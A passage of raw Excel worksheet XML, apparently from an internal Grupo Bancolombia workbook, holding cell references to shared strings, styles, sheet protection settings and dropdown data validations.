      <c r="D1" s="22" t="s">
        <v>57</v>
      </c>
      <c r="E1" s="22" t="s">
        <v>58</v>
      </c>
      <c r="F1" s="22" t="s">
        <v>59</v>
      </c>
      <c r="G1" s="22" t="s">
        <v>63</v>
      </c>
      <c r="H1" s="22" t="s">
        <v>64</v>
      </c>
      <c r="I1" s="23" t="s">
        <v>65</v>
      </c>
      <c r="J1" s="20" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A2" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>3932</v>
      </c>
      <c r="C2" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="1"/>
      <c r="G2" s="1"/>
      <c r="H2" s="2"/>
      <c r="I2" s="24"/>
      <c r="J2" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="3" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A3" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>3935</v>
      </c>
      <c r="C3" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D3" s="2"/>
      <c r="E3" s="2"/>
      <c r="F3" s="1"/>
      <c r="G3" s="1"/>
      <c r="H3" s="2"/>
      <c r="I3" s="24"/>
      <c r="J3" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="4" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A4" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>3936</v>
      </c>
      <c r="C4" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D4" s="2"/>
      <c r="E4" s="2"/>
      <c r="F4" s="1"/>
      <c r="G4" s="1"/>
      <c r="H4" s="2"/>
      <c r="I4" s="24"/>
      <c r="J4" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="5" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A5" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>3937</v>
      </c>
      <c r="C5" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D5" s="2"/>
      <c r="E5" s="2"/>
      <c r="F5" s="1"/>
      <c r="G5" s="1"/>
      <c r="H5" s="2"/>
      <c r="I5" s="24"/>
      <c r="J5" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="6" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A6" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>3938</v>
      </c>
      <c r="C6" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D6" s="2"/>
      <c r="E6" s="2"/>
      <c r="F6" s="1"/>
      <c r="G6" s="1"/>
      <c r="H6" s="2"/>
      <c r="I6" s="24"/>
      <c r="J6" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="7" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A7" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>3939</v>
      </c>
      <c r="C7" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D7" s="2"/>
      <c r="E7" s="2"/>
      <c r="F7" s="1"/>
      <c r="G7" s="1"/>
      <c r="H7" s="2"/>
      <c r="I7" s="24"/>
      <c r="J7" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="8" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A8" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>3940</v>
      </c>
      <c r="C8" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D8" s="2"/>
      <c r="E8" s="2"/>
      <c r="F8" s="1"/>
      <c r="G8" s="1"/>
      <c r="H8" s="2"/>
      <c r="I8" s="24"/>
      <c r="J8" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="9" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A9" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>3941</v>
      </c>
      <c r="C9" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D9" s="2"/>
      <c r="E9" s="2"/>
      <c r="F9" s="1"/>
      <c r="G9" s="1"/>
      <c r="H9" s="2"/>
      <c r="I9" s="24"/>
      <c r="J9" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="10" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A10" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>3942</v>
      </c>
      <c r="C10" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D10" s="2"/>
      <c r="E10" s="2"/>
      <c r="F10" s="1"/>
      <c r="G10" s="1"/>
      <c r="H10" s="2"/>
      <c r="I10" s="24"/>
      <c r="J10" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="11" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A11" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>3943</v>
      </c>
      <c r="C11" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D11" s="2"/>
      <c r="E11" s="2"/>
      <c r="F11" s="1"/>
      <c r="G11" s="1"/>
      <c r="H11" s="2"/>
      <c r="I11" s="2"/>
      <c r="J11" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="12" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A12" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>3944</v>
      </c>
      <c r="C12" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D12" s="2"/>
      <c r="E12" s="2"/>
      <c r="F12" s="1"/>
      <c r="G12" s="1"/>
      <c r="H12" s="2"/>
      <c r="I12" s="2"/>
      <c r="J12" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="13" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A13" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>3945</v>
      </c>
      <c r="C13" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D13" s="2"/>
      <c r="E13" s="2"/>
      <c r="F13" s="1"/>
      <c r="G13" s="1"/>
      <c r="H13" s="2"/>
      <c r="I13" s="2"/>
      <c r="J13" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="14" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A14" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>3946</v>
      </c>
      <c r="C14" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D14" s="2"/>
      <c r="E14" s="2"/>
      <c r="F14" s="1"/>
      <c r="G14" s="1"/>
      <c r="H14" s="2"/>
      <c r="I14" s="2"/>
      <c r="J14" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="15" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A15" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>3947</v>
      </c>
      <c r="C15" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D15" s="2"/>
      <c r="E15" s="2"/>
      <c r="F15" s="1"/>
      <c r="G15" s="1"/>
      <c r="H15" s="2"/>
      <c r="I15" s="2"/>
      <c r="J15" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="16" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A16" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>3948</v>
      </c>
      <c r="C16" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D16" s="2"/>
      <c r="E16" s="2"/>
      <c r="F16" s="1"/>
      <c r="G16" s="1"/>
      <c r="H16" s="2"/>
      <c r="I16" s="2"/>
      <c r="J16" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="17" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A17" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>3949</v>
      </c>
      <c r="C17" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D17" s="2"/>
      <c r="E17" s="2"/>
      <c r="F17" s="1"/>
      <c r="G17" s="1"/>
      <c r="H17" s="2"/>
      <c r="I17" s="2"/>
      <c r="J17" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="18" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A18" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>3950</v>
      </c>
      <c r="C18" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D18" s="2"/>
      <c r="E18" s="19"/>
      <c r="F18" s="1"/>
      <c r="G18" s="1"/>
      <c r="H18" s="2"/>
      <c r="I18" s="19"/>
      <c r="J18" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="19" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A19" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>3951</v>
      </c>
      <c r="C19" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D19" s="2"/>
      <c r="E19" s="2"/>
      <c r="F19" s="1"/>
      <c r="G19" s="1"/>
      <c r="H19" s="2"/>
      <c r="I19" s="2"/>
      <c r="J19" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="20" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A20" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>3952</v>
      </c>
      <c r="C20" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D20" s="2"/>
      <c r="E20" s="2"/>
      <c r="F20" s="1"/>
      <c r="G20" s="1"/>
      <c r="H20" s="2"/>
      <c r="I20" s="2"/>
      <c r="J20" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="21" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A21" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>3953</v>
      </c>
      <c r="C21" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D21" s="2"/>
      <c r="E21" s="2"/>
      <c r="F21" s="1"/>
      <c r="G21" s="1"/>
      <c r="H21" s="2"/>
      <c r="I21" s="2"/>
      <c r="J21" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="22" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A22" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>3954</v>
      </c>
      <c r="C22" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D22" s="2"/>
      <c r="E22" s="2"/>
      <c r="F22" s="1"/>
      <c r="G22" s="1"/>
      <c r="H22" s="2"/>
      <c r="I22" s="2"/>
      <c r="J22" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="23" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A23" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>3955</v>
      </c>
      <c r="C23" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D23" s="2"/>
      <c r="E23" s="2"/>
      <c r="F23" s="1"/>
      <c r="G23" s="1"/>
      <c r="H23" s="2"/>
      <c r="I23" s="2"/>
      <c r="J23" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="24" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A24" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>3956</v>
      </c>
      <c r="C24" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D24" s="2"/>
      <c r="E24" s="2"/>
      <c r="F24" s="1"/>
      <c r="G24" s="1"/>
      <c r="H24" s="2"/>
      <c r="I24" s="2"/>
      <c r="J24" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="25" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A25" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>3957</v>
      </c>
      <c r="C25" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D25" s="2"/>
      <c r="E25" s="2"/>
      <c r="F25" s="1"/>
      <c r="G25" s="1"/>
      <c r="H25" s="2"/>
      <c r="I25" s="2"/>
      <c r="J25" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="26" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A26" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>3958</v>
      </c>
      <c r="C26" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D26" s="2"/>
      <c r="E26" s="2"/>
      <c r="F26" s="1"/>
      <c r="G26" s="1"/>
      <c r="H26" s="2"/>
      <c r="I26" s="2"/>
      <c r="J26" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="27" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A27" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>3959</v>
      </c>
      <c r="C27" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D27" s="2"/>
      <c r="E27" s="2"/>
      <c r="F27" s="1"/>
      <c r="G27" s="1"/>
      <c r="H27" s="2"/>
      <c r="I27" s="2"/>
      <c r="J27" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="28" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A28" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>3960</v>
      </c>
      <c r="C28" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D28" s="2"/>
      <c r="E28" s="2"/>
      <c r="F28" s="1"/>
      <c r="G28" s="1"/>
      <c r="H28" s="2"/>
      <c r="I28" s="2"/>
      <c r="J28" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="29" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A29" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>3961</v>
      </c>
      <c r="C29" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D29" s="2"/>
      <c r="E29" s="2"/>
      <c r="F29" s="1"/>
      <c r="G29" s="1"/>
      <c r="H29" s="2"/>
      <c r="I29" s="2"/>
      <c r="J29" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="30" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A30" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>3962</v>
      </c>
      <c r="C30" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D30" s="2"/>
      <c r="E30" s="2"/>
      <c r="F30" s="1"/>
      <c r="G30" s="1"/>
      <c r="H30" s="2"/>
      <c r="I30" s="2"/>
      <c r="J30" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="31" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A31" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>3963</v>
      </c>
      <c r="C31" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D31" s="2"/>
      <c r="E31" s="2"/>
      <c r="F31" s="1"/>
      <c r="G31" s="1"/>
      <c r="H31" s="2"/>
      <c r="I31" s="2"/>
      <c r="J31" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="32" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A32" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>3964</v>
      </c>
      <c r="C32" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D32" s="2"/>
      <c r="E32" s="19"/>
      <c r="F32" s="1"/>
      <c r="G32" s="1"/>
      <c r="H32" s="2"/>
      <c r="I32" s="19"/>
      <c r="J32" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="33" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A33" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>3965</v>
      </c>
      <c r="C33" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D33" s="2"/>
      <c r="E33" s="2"/>
      <c r="F33" s="1"/>
      <c r="G33" s="1"/>
      <c r="H33" s="2"/>
      <c r="I33" s="2"/>
      <c r="J33" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="34" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A34" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B34" s="2" t="s">
        <v>3966</v>
      </c>
      <c r="C34" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D34" s="2"/>
      <c r="E34" s="2"/>
      <c r="F34" s="1"/>
      <c r="G34" s="1"/>
      <c r="H34" s="2"/>
      <c r="I34" s="2"/>
      <c r="J34" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="35" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A35" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B35" s="2" t="s">
        <v>3967</v>
      </c>
      <c r="C35" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D35" s="2"/>
      <c r="E35" s="2"/>
      <c r="F35" s="1"/>
      <c r="G35" s="1"/>
      <c r="H35" s="2"/>
      <c r="I35" s="2"/>
      <c r="J35" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="36" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A36" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B36" s="2" t="s">
        <v>3968</v>
      </c>
      <c r="C36" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D36" s="2"/>
      <c r="E36" s="2"/>
      <c r="F36" s="1"/>
      <c r="G36" s="1"/>
      <c r="H36" s="2"/>
      <c r="I36" s="2"/>
      <c r="J36" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="37" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A37" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>3969</v>
      </c>
      <c r="C37" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D37" s="2"/>
      <c r="E37" s="2"/>
      <c r="F37" s="1"/>
      <c r="G37" s="1"/>
      <c r="H37" s="2"/>
      <c r="I37" s="2"/>
      <c r="J37" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="38" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A38" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B38" s="2" t="s">
        <v>3970</v>
      </c>
      <c r="C38" s="18" t="s">
        <v>3933</v>
      </c>
      <c r="D38" s="2"/>
      <c r="E38" s="2"/>
      <c r="F38" s="1"/>
      <c r="G38" s="1"/>
      <c r="H38" s="2"/>
      <c r="I38" s="2"/>
      <c r="J38" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection algorithmName="SHA-512" hashValue="SagvDaXVYsC7RP4fvE0giP+D15KG6e8aos+nGiZJewPC72F8HrFQz7bm3janCWig7x4Tms2dITZ0L3HNRT38JQ==" saltValue="ZVSqONKB54yabkIG0KZoDA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
  <autoFilter ref="A1:J38" xr:uid="{0F18D045-A8EE-4105-8068-008E31CB42F2}"/>
  <dataValidations count="2">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="H25:H29 H34:H38" xr:uid="{B281C90B-A99A-4E9A-8AA1-827670956F38}">
      <formula1>INDIRECT(F25)</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="F2:F38" xr:uid="{8A0BB8EB-EE25-4353-9D17-C1D759E07677}">
      <formula1>INDIRECT(E2)</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;C&amp;G&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#</oddHead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2A8498E8-A93F-497C-A6D8-1E20A92AF78F}">
          <x14:formula1>
            <xm:f>Lista!$A$1:$R$1</xm:f>
          </x14:formula1>
          <xm:sqref>E2:E38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4E2C5-90B2-4EDC-915D-B8A4CF501C25}">
  <sheetPr codeName="Hoja13"/>
  <dimension ref="A1:A12"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B30" sqref="B30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="37.08984375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A1" s="6" t="s">
        <v>3971</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A2" s="5" t="s">
        <v>3972</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A3" s="5" t="s">
        <v>3973</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A4" s="5" t="s">
        <v>1691</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A5" s="5" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A6" s="5" t="s">
        <v>612</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A7" s="5" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A8" s="5" t="s">
        <v>843</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A9" s="5" t="s">
        <v>1046</v>
      </c>
    </row>
    <row r="10" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A10" s="5" t="s">
        <v>784</v>
      </c>
    </row>
    <row r="11" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A11" s="5" t="s">
        <v>2496</v>
      </c>
    </row>
    <row r="12" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A12" s="5" t="s">
        <v>2045</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;C&amp;G&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#</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80D8-7676-490A-8149-7C1788CC8E26}">
  <sheetPr codeName="Hoja14"/>
  <dimension ref="A1:P97"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="P87" sqref="P87"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="5" max="5" width="44.90625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="9" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="23.54296875" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="29.36328125" customWidth="1"/>
    <col min="9" max="9" width="48.90625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="24.6328125" customWidth="1"/>
    <col min="11" max="11" width="32.453125" customWidth="1"/>
    <col min="12" max="12" width="26.90625" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="23.453125" customWidth="1"/>
    <col min="14" max="14" width="21.90625" customWidth="1"/>
    <col min="15" max="15" width="18.6328125" customWidth="1"/>
    <col min="16" max="16" width="14" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A1" s="28" t="s">
        <v>1</v>
      </c>
      <c r="B1" s="46" t="s">
        <v>51</v>
      </c>
      <c r="C1" s="46" t="s">
        <v>52</v>
      </c>
      <c r="D1" s="46" t="s">
        <v>53</v>
      </c>
      <c r="E1" s="29" t="s">
        <v>54</v>
      </c>
      <c r="F1" s="30" t="s">
        <v>55</v>
      </c>
      <c r="G1" s="30" t="s">
        <v>56</v>
      </c>
      <c r="H1" s="29" t="s">
        <v>57</v>
      </c>
      <c r="I1" s="29" t="s">
        <v>58</v>
      </c>
      <c r="J1" s="29" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="29" t="s">
        <v>77</v>
      </c>
      <c r="L1" s="29" t="s">
        <v>59</v>
      </c>
      <c r="M1" s="29" t="s">
        <v>63</v>
      </c>
      <c r="N1" s="29" t="s">
        <v>64</v>
      </c>
      <c r="O1" s="31" t="s">
        <v>65</v>
      </c>
      <c r="P1" s="29" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A2" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="17"/>
      <c r="C2" s="17"/>
      <c r="D2" s="17"/>
      <c r="E2" s="32" t="s">
        <v>3974</v>
      </c>
      <c r="F2" s="25">
        <v>100</v>
      </c>
      <c r="G2" s="25"/>
      <c r="H2" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I2" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J2" s="17"/>
      <c r="K2" s="17"/>
      <c r="L2" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M2" s="17"/>
      <c r="N2" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O2" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P2" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="3" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A3" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B3" s="1"/>
      <c r="C3" s="1"/>
      <c r="D3" s="1"/>
      <c r="E3" s="1" t="s">
        <v>3977</v>
      </c>
      <c r="F3" s="26">
        <v>100</v>
      </c>
      <c r="G3" s="26"/>
      <c r="H3" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I3" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J3" s="1"/>
      <c r="K3" s="1"/>
      <c r="L3" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M3" s="1"/>
      <c r="N3" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O3" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P3" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="4" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A4" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1"/>
      <c r="D4" s="1"/>
      <c r="E4" s="1" t="s">
        <v>3978</v>
      </c>
      <c r="F4" s="26">
        <v>100</v>
      </c>
      <c r="G4" s="26"/>
      <c r="H4" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I4" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J4" s="1"/>
      <c r="K4" s="1"/>
      <c r="L4" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M4" s="1"/>
      <c r="N4" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O4" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P4" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="5" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A5" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B5" s="1"/>
      <c r="C5" s="1"/>
      <c r="D5" s="1"/>
      <c r="E5" s="1" t="s">
        <v>3979</v>
      </c>
      <c r="F5" s="26">
        <v>100</v>
      </c>
      <c r="G5" s="26"/>
      <c r="H5" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I5" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J5" s="1"/>
      <c r="K5" s="1"/>
      <c r="L5" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M5" s="1"/>
      <c r="N5" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O5" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P5" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="6" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A6" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B6" s="17"/>
      <c r="C6" s="17"/>
      <c r="D6" s="17"/>
      <c r="E6" s="17" t="s">
        <v>3980</v>
      </c>
      <c r="F6" s="25">
        <v>100</v>
      </c>
      <c r="G6" s="25"/>
      <c r="H6" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I6" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J6" s="17"/>
      <c r="K6" s="17"/>
      <c r="L6" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M6" s="17"/>
      <c r="N6" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O6" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P6" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="7" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A7" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B7" s="17"/>
      <c r="C7" s="17"/>
      <c r="D7" s="17"/>
      <c r="E7" s="1" t="s">
        <v>3981</v>
      </c>
      <c r="F7" s="26">
        <v>100</v>
      </c>
      <c r="G7" s="26"/>
      <c r="H7" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I7" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>779</v>
      </c>
